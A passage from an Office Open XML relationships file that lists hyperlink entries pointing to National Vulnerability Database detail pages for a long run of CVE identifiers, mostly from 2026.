Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80115" TargetMode="External" Id="rId3631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80117" TargetMode="External" Id="rId3632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId3633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId3634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82398" TargetMode="External" Id="rId3635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82462" TargetMode="External" Id="rId3636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82465" TargetMode="External" Id="rId3637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82476" TargetMode="External" Id="rId3638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82530" TargetMode="External" Id="rId3639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82853" TargetMode="External" Id="rId3640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83492" TargetMode="External" Id="rId3641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83530" TargetMode="External" Id="rId3642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId3643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84186" TargetMode="External" Id="rId3644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84199" TargetMode="External" Id="rId3645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84201" TargetMode="External" Id="rId3646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84309" TargetMode="External" Id="rId3647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84478" TargetMode="External" Id="rId3648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84481" TargetMode="External" Id="rId3649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84483" TargetMode="External" Id="rId3650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84697" TargetMode="External" Id="rId3651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84941" TargetMode="External" Id="rId3652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84968" TargetMode="External" Id="rId3653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId3654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId3655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85149" TargetMode="External" Id="rId3656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85156" TargetMode="External" Id="rId3657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85157" TargetMode="External" Id="rId3658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85242" TargetMode="External" Id="rId3659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85586" TargetMode="External" Id="rId3660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85609" TargetMode="External" Id="rId3661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85621" TargetMode="External" Id="rId3662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85662" TargetMode="External" Id="rId3663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86138" TargetMode="External" Id="rId3664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86139" TargetMode="External" Id="rId3665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86142" TargetMode="External" Id="rId3666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86143" TargetMode="External" Id="rId3667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86188" TargetMode="External" Id="rId3668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86194" TargetMode="External" Id="rId3669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86200" TargetMode="External" Id="rId3670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86206" TargetMode="External" Id="rId3671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86252" TargetMode="External" Id="rId3672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86303" TargetMode="External" Id="rId3673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86317" TargetMode="External" Id="rId3674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86431" TargetMode="External" Id="rId3675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86432" TargetMode="External" Id="rId3676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86539" TargetMode="External" Id="rId3677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86547" TargetMode="External" Id="rId3678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86748" TargetMode="External" Id="rId3679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86777" TargetMode="External" Id="rId3680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId3681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId3682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId3683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8712" TargetMode="External" Id="rId3684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87727" TargetMode="External" Id="rId3685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87747" TargetMode="External" Id="rId3686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87810" TargetMode="External" Id="rId3687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87820" TargetMode="External" Id="rId3688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8793" TargetMode="External" Id="rId3689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8794" TargetMode="External" Id="rId3690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88050" TargetMode="External" Id="rId3691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88054" TargetMode="External" Id="rId3692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88878" TargetMode="External" Id="rId3693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88884" TargetMode="External" Id="rId3694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88896" TargetMode="External" Id="rId3695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88940" TargetMode="External" Id="rId3696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89044" TargetMode="External" Id="rId3697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89173" TargetMode="External" Id="rId3698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89175" TargetMode="External" Id="rId3699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89242" TargetMode="External" Id="rId3700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89248" TargetMode="External" Id="rId3701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37268" TargetMode="External" Id="rId3702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15647" TargetMode="External" Id="rId3703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15690" TargetMode="External" Id="rId3704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46808" TargetMode="External" Id="rId3705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15927" TargetMode="External" Id="rId3706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18796" TargetMode="External" Id="rId3707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19398" TargetMode="External" Id="rId3708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21103" TargetMode="External" Id="rId3709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3012" TargetMode="External" Id="rId3710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32639" TargetMode="External" Id="rId3711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42808" TargetMode="External" Id="rId3712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47763" TargetMode="External" Id="rId3713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49349" TargetMode="External" Id="rId3714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50576" TargetMode="External" Id="rId3715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50719" TargetMode="External" Id="rId3716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52097" TargetMode="External" Id="rId3717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53196" TargetMode="External" Id="rId3718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55088" TargetMode="External" Id="rId3719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55421" TargetMode="External" Id="rId3720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55535" TargetMode="External" Id="rId3721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61608" TargetMode="External" Id="rId3722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId3723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67352" TargetMode="External" Id="rId3724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId3725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId3726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId3727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId3728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71194" TargetMode="External" Id="rId3729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId3730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId3731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId3732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId3733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72703" TargetMode="External" Id="rId3734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72704" TargetMode="External" Id="rId3735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72705" TargetMode="External" Id="rId3736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72714" TargetMode="External" Id="rId3737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId3738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId3739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73066" TargetMode="External" Id="rId3740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73419" TargetMode="External" Id="rId3741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74853" TargetMode="External" Id="rId3742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId3743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76226" TargetMode="External" Id="rId3744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76227" TargetMode="External" Id="rId3745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId3746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId3747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId3748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81052" TargetMode="External" Id="rId3749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82325" TargetMode="External" Id="rId3750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82525" TargetMode="External" Id="rId3751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82640" TargetMode="External" Id="rId3752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82846" TargetMode="External" Id="rId3753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83541" TargetMode="External" Id="rId3754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83544" TargetMode="External" Id="rId3755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83545" TargetMode="External" Id="rId3756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83546" TargetMode="External" Id="rId3757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84021" TargetMode="External" Id="rId3758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84022" TargetMode="External" Id="rId3759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84028" TargetMode="External" Id="rId3760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84221" TargetMode="External" Id="rId3761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84896" TargetMode="External" Id="rId3762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84899" TargetMode="External" Id="rId3763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84930" TargetMode="External" Id="rId3764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84931" TargetMode="External" Id="rId3765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84937" TargetMode="External" Id="rId3766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85201" TargetMode="External" Id="rId3767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85456" TargetMode="External" Id="rId3768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85678" TargetMode="External" Id="rId3769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86497" TargetMode="External" Id="rId3770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86780" TargetMode="External" Id="rId3771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87015" TargetMode="External" Id="rId3772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87872" TargetMode="External" Id="rId3773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20506" TargetMode="External" Id="rId3774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20507" TargetMode="External" Id="rId3775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20508" TargetMode="External" Id="rId3776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20509" TargetMode="External" Id="rId3777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20510" TargetMode="External" Id="rId3778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20511" TargetMode="External" Id="rId3779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20512" TargetMode="External" Id="rId3780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20517" TargetMode="External" Id="rId3781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44845" TargetMode="External" Id="rId3782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48121" TargetMode="External" Id="rId3783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5522" TargetMode="External" Id="rId3784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65979" TargetMode="External" Id="rId3785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId3786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId3787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId3788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70425" TargetMode="External" Id="rId3789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70594" TargetMode="External" Id="rId3790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId3791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72719" TargetMode="External" Id="rId3792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId3793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId3794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" 